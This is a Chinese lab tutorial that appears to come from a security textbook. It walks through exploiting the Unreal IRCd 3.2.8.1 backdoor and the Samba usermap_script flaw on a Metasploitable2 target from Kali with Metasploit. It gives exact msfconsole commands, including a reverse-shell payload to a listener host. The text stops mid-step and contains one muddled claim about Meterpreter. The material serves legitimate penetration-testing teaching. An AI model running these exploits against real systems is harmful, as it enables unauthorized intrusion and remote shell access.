实训目的:
Metasploitable2是一款基于Ubuntu Linux的操作系统。该系统本身设计作为安全工具测试和演示常见漏洞攻击的靶机,所以它存在大量未打补丁漏洞,并且开放了无数高危端口。本实训介绍针对Unreal IRCd和Samba这两个常用网络服务的攻击,让读者了解针对Linux网络服务攻击的方法。
场景描述:
在虚拟机环境下配置 “Kali Linux”和“Metasploitable2”虚拟系统,使得2个系统之间能够相互通信,网络拓扑如图7-35所示。
图7-35 网络拓扑
Download Metasploitable - Intentionally Vulnerable Machine | Rapid7
将metasploitable linux 版本进行解压
查看目标主机ip地址
1.在Kali的终端中输入命令“nmap –v -n -A 192.168.214.130”对目标主机进行全面的扫描。从返回信息中可以获得Unreal IRCd,如图7-36所示和Samba的版本,如图7-37所示。
任务1 渗透攻击Linux的Unreal IRCd服务
实训步骤:
1.在Kali终端中输入命令“service postgresql start”,启动PostSQL数据库,然后输入命令“msfdb init”,初始化数据库。
2.在Kali终端输入命令“msfconsole ”,启动Metasploit。
3.输入命令“search Unreal 3.2.8.1”,搜索Unreal 3.2.8.1漏洞对应的模块,如图所示。
4.输入命令“info exploit/unix/irc/unreal_ircd_3281_backdoor”,查看unreal_ircd_3281_backdoor模块的详细信息。
5.输入命令“use exploit/unix/irc/unreal_ircd_3281_backdoor”,启用这个渗透攻击模块,然后输入命令“show payloads”,查看该模块所适用的攻击载荷,如图所示。
图7-39 启用渗透攻击模块
从输出模块的描述信息,可以看到这些攻击载荷都是命令行shell。这样就不能进入Meterpreter了。
6.输入命令“set payload cmd/unix/reverse”,然后输入命令“show options”,查看渗透攻击的配置选项。
7.输入命令“set RHOST 192.168.214.130”,设置目标主机地址,指的是要渗透的操作系统;输入命令“set LHOST 192.168.214.128”,设置监听主机地址,切忌监听主机指的是本机;输入命令“show options”查看渗透攻击模块和攻击载荷所配置的情况,确保没有错误。
8.输入命令“exploit”,实施攻击,从输出的信息中,可以看到成功打开一个会话,但是没有进入任何shell的提示符,只有一个闪烁的光标,如图所示。这表示连接到目标主机的一个终端shell,此时可以执行任何标准的Linux命令。例如,查看目标系统当前IP地址 “ifconfig”等。
进行攻击,发现攻击成功,相当于kali渗透meterpreter 成功,可以执行任何关于kali的操作。
任务2 渗透攻击Linux的Samba服务
1.在Kali终端输入命令“msfconsole ”,启动Metasploit。
2.输入命令“use auxiliary/scanner/smb/smb_version”,使用smb_version模块扫描Samba服务版本。
3.输入命令“set RHOSTS 192.168.214.130”,设置目标主机地址。
4.输入命令“exploit”,启动扫描,如图所示。该扫描结果与Nmap扫描结果是一样的。
5. 输入命令“search samba/usermap”,搜索usermap模块,如图7-42所示。
6. 输入命令“use exploit/multi/samba/usermap_script”,启用这个渗透攻击模块。然后输入命令“set RHOST 192.168.214.130”,设置目标主机地址。该模块仅需要配置RHOST选项,不需要加载任何攻击载荷,就可以自动使用一个Linux命令Shell。输入命令“exploit”,实施攻击,